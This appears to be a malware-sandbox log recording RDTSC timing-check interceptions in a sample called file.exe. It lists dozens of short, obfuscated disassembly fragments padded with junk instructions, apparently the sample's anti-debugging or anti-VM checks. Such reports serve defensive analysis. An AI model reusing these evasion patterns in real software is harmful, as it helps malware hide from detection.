Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3DE0 second address: AF3E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+12455B72h], esi 0x00000010 adc edi, 6D9226BAh 0x00000016 lea eax, dword ptr [ebp+12494AE2h] 0x0000001c jmp 00007F33B8C742FFh 0x00000021 mov edi, dword ptr [ebp+122D2275h] 0x00000027 push eax 0x00000028 jmp 00007F33B8C74300h 0x0000002d mov dword ptr [esp], eax 0x00000030 mov edi, dword ptr [ebp+122D27EAh] 0x00000036 lea eax, dword ptr [ebp+12494A9Eh] 0x0000003c mov dl, bh 0x0000003e xor dword ptr [ebp+122D2778h], ebx 0x00000044 nop 0x00000045 push ecx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF3E3E second address: ACC599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007F33B8517E9Dh 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F33B8517E98h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xor dx, 4CE1h 0x00000030 call dword ptr [ebp+122D2CBAh] 0x00000036 jmp 00007F33B8517EA9h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F33B8517EA3h 0x00000042 push eax 0x00000043 push edx 0x00000044 jno 00007F33B8517E96h 0x0000004a jnc 00007F33B8517E96h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACC599 second address: ACC5C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74305h 0x00000007 jmp 00007F33B8C74301h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA2525 second address: AA252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24446 second address: B2444B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B249D3 second address: B249D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B249D9 second address: B249DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B249DD second address: B249E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24B2F second address: B24B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24B35 second address: B24B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2AAAC second address: B2AAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2AAB6 second address: B2AABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2AABC second address: B2AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74306h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2AAD7 second address: B2AB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jc 00007F33B8517EACh 0x00000010 jmp 00007F33B8517EA4h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F33B8517E96h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29805 second address: B2982E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74307h 0x00000007 push esi 0x00000008 jns 00007F33B8C742F6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2982E second address: B2984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F33B8517EA7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2984D second address: B29868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8C742F6h 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F33B8C742F6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29868 second address: B2986C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2986C second address: B29872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B29E4C second address: B29E73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517EB2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A4CD second address: B2A4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F33B8C742FCh 0x0000000c jo 00007F33B8C742F6h 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FC96 second address: B2FC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FC9B second address: B2FCB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FDF0 second address: B2FE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8517E9Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FE05 second address: B2FE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2FF32 second address: B2FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30209 second address: B3020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3020F second address: B30223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8517E9Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30223 second address: B30245 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8C74305h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B303A9 second address: B303AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3053F second address: B30545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B306B0 second address: B306BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517E9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3083A second address: B30841 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B309F6 second address: B30A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA5h 0x00000009 jmp 00007F33B8517EA8h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30A28 second address: B30A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F33B8C742FCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30A3A second address: B30A50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F33B8517E96h 0x00000010 jnl 00007F33B8517E96h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B30D2C second address: B30D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C74305h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F33B8C74303h 0x00000014 jmp 00007F33B8C742FBh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F33B8C74303h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34653 second address: B34657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34657 second address: B34669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34669 second address: B34677 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34677 second address: B3467B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA9AC second address: AAA9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F33B8517E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA9B7 second address: AAA9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F33B8C74302h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33F09 second address: B33F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3422E second address: B34234 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34388 second address: B343A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F33B8517E9Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36A79 second address: B36A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74309h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA7D second address: B3CA87 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA87 second address: B3CA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA8D second address: B3CA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA91 second address: B3CA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBA9 second address: B3CBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F33B8517E96h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBB8 second address: B3CBC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F33B8C742F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBC3 second address: B3CBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F33B8517E96h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBD4 second address: B3CBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBDA second address: B3CBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBDE second address: B3CC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007F33B8C74302h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F33B8C74303h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD69 second address: B3CD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD74 second address: B3CD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEC3 second address: B3CEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007F33B8517E9Ch 0x0000000b push esi 0x0000000c jns 00007F33B8517E96h 0x00000012 js 00007F33B8517E96h 0x00000018 pop esi 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edx 0x0000001f pop edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEED second address: B3CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEF6 second address: B3CEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3D083 second address: B3D087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41FDE second address: B41FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B422DC second address: B422E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4651B second address: B46521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46521 second address: B4653B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4653B second address: B46541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46541 second address: B4654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4654E second address: B46558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F33B8517E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46558 second address: B4655C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4655C second address: B46568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45799 second address: B457A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F33B8C742F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B457A6 second address: B457C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F33B8517E96h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F33B8517E96h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F33B8517E96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B457C7 second address: B457CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45AF6 second address: B45B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F33B8517E96h 0x00000012 jmp 00007F33B8517E9Ch 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45B15 second address: B45B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F33B8C742F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45DC2 second address: B45E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F33B8517EA2h 0x0000000f jmp 00007F33B8517E9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F33B8517E96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45E08 second address: B45E12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33B8C742F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6C4 second address: B4C6CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6CA second address: B4C6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6CF second address: B4C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F33B8517E96h 0x0000000a jmp 00007F33B8517E9Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6EA second address: B4C6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F33B8C742F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6FD second address: B4C70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F33B8517E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0BD second address: B4D0C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8C742F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0C9 second address: B4D0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0CE second address: B4D0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F33B8C742F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F33B8C742FBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0E8 second address: B4D10E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F33B8517EA4h 0x0000000f jno 00007F33B8517E98h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8E1 second address: B4D8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DBBD second address: B4DBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DBC1 second address: B4DBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C742FFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DEE0 second address: B4DF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8517EA1h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jne 00007F33B8517E96h 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E1A7 second address: B4E1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F33B8C742F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F33B8C74308h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E1CE second address: B4E1DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
